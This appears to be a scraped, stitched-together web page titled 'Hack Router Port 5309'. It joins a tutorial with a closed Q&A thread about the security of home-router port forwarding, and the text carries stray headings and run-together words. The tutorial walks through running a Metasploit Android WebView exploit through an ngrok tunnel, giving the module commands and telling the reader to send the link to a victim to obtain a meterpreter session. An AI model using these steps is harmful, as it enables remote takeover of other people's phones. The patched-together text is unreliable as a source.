Hack Router Port 5309

Jun 03, 2016 how to hack a router remotely millions of routers still vulnerable 2016 visit. Set up Port Forwarding for Hacking Across the City, State, or World. Hack Router Port 5353. Of all the great DIY projects at this year's Maker Faire, the one project that really caught my eye involved converting a regular old $60 router into a powerful, highly configurable $600 router.

Inall of my previous Metasploit articles or videos, I am always performingattacks on LAN. Lots of people were asking me how to use Metasploit on theInternet or WAN. One way is to port forward the router. But in today's post, Iam going to use a different method which doesn't require any port forwarding.




Setting Ngrok


·First of all, we start with creating account at Ngrok.com
·After signing up, log in to Ngrok.com and download the ngrokfile.
·Now extract the file and open terminal in that folder.
·Log in again to your ngrok account and type the commandsavailable on that page.

·Copy the authentication code command and paste in the terminal.
./ngrok authtokenyour_authentication_code


·With the above command, the authentication code will be saved inyour computer.
·Now type the following command to start the tunnel.
./ngrok http4431
·Now the ngrok will start a tunnel to your computer. Copy theNgrok URL we will need this URL later in this tutorial. Also remember the portin above command.
Hack Router Port 5309

Using Metasploit withNgrok


·For this tutorial, we are using Android web view exploit.
·Now type the following command to load Android web view exploit.
useexploit/android/browser/webview_addjavascriptinterface
·Now while setting SRVHOST and LHOST use localhost.
set srvhost localhost
set lhost localhost
How to open a router port
·In SRVPORT we will use same port that we have used whilestarting ngrok .i.e 4431.
set srvport 4431
·Now set URIPATH to /. Use the following commands.
set uripath /
·Above three steps are most important, so don't change thevalues.
·Now you can send the link that you have got when you startedNgrok to the victim and you we be able to get themeterpreter session over the internet

Video Demonstration



Use Social EngineeringToolkit without Port Forwarding

NOTE

·Don't change the values of srvhost, lhost and uripath.
·Make sure srvport and port you set while starting ngrok aresame.

Author:

Thisarticle has been written by Aditya Joshi who writes for creedsec.netand can be reached on @darktruth190
Forwarding
Active6 years, 6 months ago

Say I have a few ports open for gaming.

My questions are

  1. Can I be hacked if the attacker knows my specific external IP?

  2. Can hacker access my router and setting by getting through these ports? If so, how likely is this to be done? How easy can this be done?

  3. With router's security setting, does it block out the attacker even with port forwarding open?

Dave
23.6k9 gold badges46 silver badges65 bronze badges

Router Port

avsdvsddavsdvsdd

closed as not constructive by Dave, Dave M, Tog, Xavierjazz, Canadian LukeMar 5 '13 at 16:14

As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, visit the help center for guidance. If this question can be reworded to fit the rules in the help center, please edit the question.

3 Answers

Port forwarding lets people connect to the mapped port on whatever device you've pointed it at. The security rests solely with whatever software on that device is listening on that port. So say you've port forwarded 12345 to remote desktop on a PC you never update. Odds are it will be easy to get in to that, and then to whatever it has access to (maybe the whole LAN including the 'secure' side of the router). On the other hand, if you port forwarded 6789 to port 22 on a Linux box you update every night, chances are very slim anyone will be able to break-in to it. #1 doesn't make sense, your IP is technically public. But if you had no ports open, there is nowhere to connect and try and break into. Some routers may have intrusion-detection features, but they may not be able to do things like decide if remote user X is you or a hacker trying to get to the forwarded port.

Luke HollinsLuke Hollins

From your question and comments I think you're a little unclear on what's happening. I'm not sure how to teach you how to run your router, i think you need to talk to someone near you to show you these things.

Port forwarding is when your router allows outside machines to initiate connections to a machine on your network. It doesn't allow any special access to the router internals, just a connection to your inside machine.

The security issue here is not your router, but your machine. Before, it was invisible to the Internet, and therefore somewhat safe. Now the internal machine can be reached. Is your internal machine safe? Is it patched? What's on that port?

As far as your specific questions:

  1. They always know your external IP address. Any connection you make to someone will show your external IP address. I can try to ping the entire Internet (and with a botnet, some people try) and find your external IP address. If you're connected to the Internet, the external IP is exposed. Also, this has nothing to do whether your ports are forwarded or not.

  2. A hacker can not access you through the forwarded ports. But your router may be set up to allow configuration on a web port. How to set this up is different for each router, but make sure anything similar to 'allow configuration on WAN' is disabled. Allow LAN configuration only.

  3. This is a hard question. Most routers are just routers. They do not know what an Attacker is. They're too dumb to know 'good guy' from 'bad guy'. Some routers also have Firewalls. They know certain bad guys, and will filter those out. But your router probably has no filters on this port. If anyone tries to connect, they're probably let in.

Also, in your comments, you ask a lot of questions. The tradition here is to take new questions out of comments and as separate questions. Please try to ask your MAC filtering questions in a new question.

Good luck. Security is very hard. Even the experts don't get it right every time.

Rich HomolkaRich Homolka
26.3k6 gold badges46 silver badges69 bronze badges

Open ports on a network are always a vulnerability of sorts, however the odds of having someone actually try to attack your network on those ports is really low. Chances are, for gaming, you're looking at like port 80 for HTTP, port 88 for UDP, and then program specific ports like 3074 for the Xbox360, or 6112 TCP for Diablo II. As I said before, an open port is always a vulnerability, but if someone actually cared enough to attack your home network the odds are there would be easier ways for them to get in than on these specific ports. If you're worried about someone getting access to your router specifically, just disable remote logins so that you have to be physically connected to login into it.

Short and simple, so long as you're only opening the specific ports games ask you to, then it's really unlikely for you to run into trouble. Just because someone knows you've got port 80 open on your router doesn't suddenly give them access to your router or your computer.

MonoMono

Zyxel Router Port Forwarding

Not the answer you're looking for? Browse other questions tagged securityrouterport-forwarding or ask your own question.